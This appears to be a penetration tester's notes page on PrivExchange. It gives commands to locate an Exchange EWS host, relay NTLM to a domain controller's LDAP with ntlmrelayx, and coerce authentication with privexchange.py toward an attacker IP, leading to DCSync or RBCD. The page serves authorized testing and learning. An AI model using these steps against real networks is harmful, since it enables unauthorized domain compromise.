Skip to content

My Hacking Notes

Exchange Coercion (PrivExchange)

My Hacking Notes

Home
OSINT
Network Scanning
Ports / Services
Port Forwarding and Tunnelling
Password Cracking
Password Cracking
- Hashcat
- Wordlists
Windows
Windows
- Workstations
  Workstations
  - Privilege Escalation
- Active Directory
  Active Directory
  - Methodology
  - Remote Execution Tools
  - PowerShell Commands
  - CMD Commands
  - Relay & Coercion
    Relay & Coercion
    
    Relay (ntlmrelayx)
    
    RPC Coercion
    
    Responder
    
    mitm6
    
    Insecure Name Resolution Protocols
    
    WPAD
    
    Exchange Coercion (PrivExchange) Exchange Coercion (PrivExchange)
    Table of contents
    
    Process
    
    Identify EWS Access
    
    Start Relay
    
    Coerce
    
    Attack Paths
    
    References
  - Discovery & Audit
    Discovery & Audit
    
    SMB & RPC Enumeration
    
    SMB Shares & Data Hunting
    
    LDAP Checks
    
    BloodHound
    
    User Enumeration
    
    Password Spraying
  - Privilege Escalation
    Privilege Escalation
    
    ADCS Discovery
    
    ADCS - ESC 1
    
    ADCS - ESC 8
    
    Shadow Credentials
    
    BadSuccessor (dMSA Abuse)
    
    ZeroLogon
  - Credential Access
    Credential Access
    
    SAM/SECURITY/SYSTEM
    
    DCSync
    
    DPAPI
    
    AutoLogon
    
    GPP/SYSVOL Credential Leaks
  - Delegation
    Delegation
    
    Discovery
    
    Resource Based Constrained Delegation (RBCD)
    
    Unconstrained Delegation (KUD)
    
    Constrained Delegation (KCD)
  - Kerberos
    Kerberos
    
    Authentication Process
    
    S4U2self and S4U2Proxy
    
    Password / Hash -> TGT
    
    AS-REP Roast
    
    Kerberoast
    
    Ticket Forgery
    Ticket Forgery
    
    Golden Ticket
    
    Silver Ticket
- File Transfer
  File Transfer
  - Download to Windows
  - Upload from Windows
Microsoft Entra ID (Azure AD)
Microsoft Entra ID (Azure AD)
- Discovery & Recon
  Discovery & Recon
  - Federated vs Managed
  - Username Enumeration
- Password Spraying
  Password Spraying
  - Tools
WiFi
WiFi
CTF Walkthroughs
CTF Walkthroughs
- Proving Grounds
  Proving Grounds
  - Cassios
  - Cobweb
  - Muddy
  - Forward

Exchange Coercion (PrivExchange)¶

Coerce Exchange to authenticate with NTLM using a feature called PushSubscription.

Patched 02/2019 (KB4490059, KB4490059)

Process¶

Identify EWS Access¶

Find the host for autodiscover, this is usually the same as the EWS host.

dig +short _autodiscover._tcp.<domain> SRV

Verify EWS Host

curl -skI https://<host>/EWS/Exchange.asmx | egrep -i 'HTTP/|WWW-Authenticate|X-FEServer'

Start Relay¶

ntlmrelayx - Target LDAP on a DC.

Coerce¶

Coerce authentication from the exchange to a target.

privexchange.py -ah <attacker_ip> <exchange_target> -d <domain> -u '<user>' -p '<password>'

https://github.com/dirkjanm/privexchange/

Attack Paths¶

DCSync
RBCD

References¶

https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/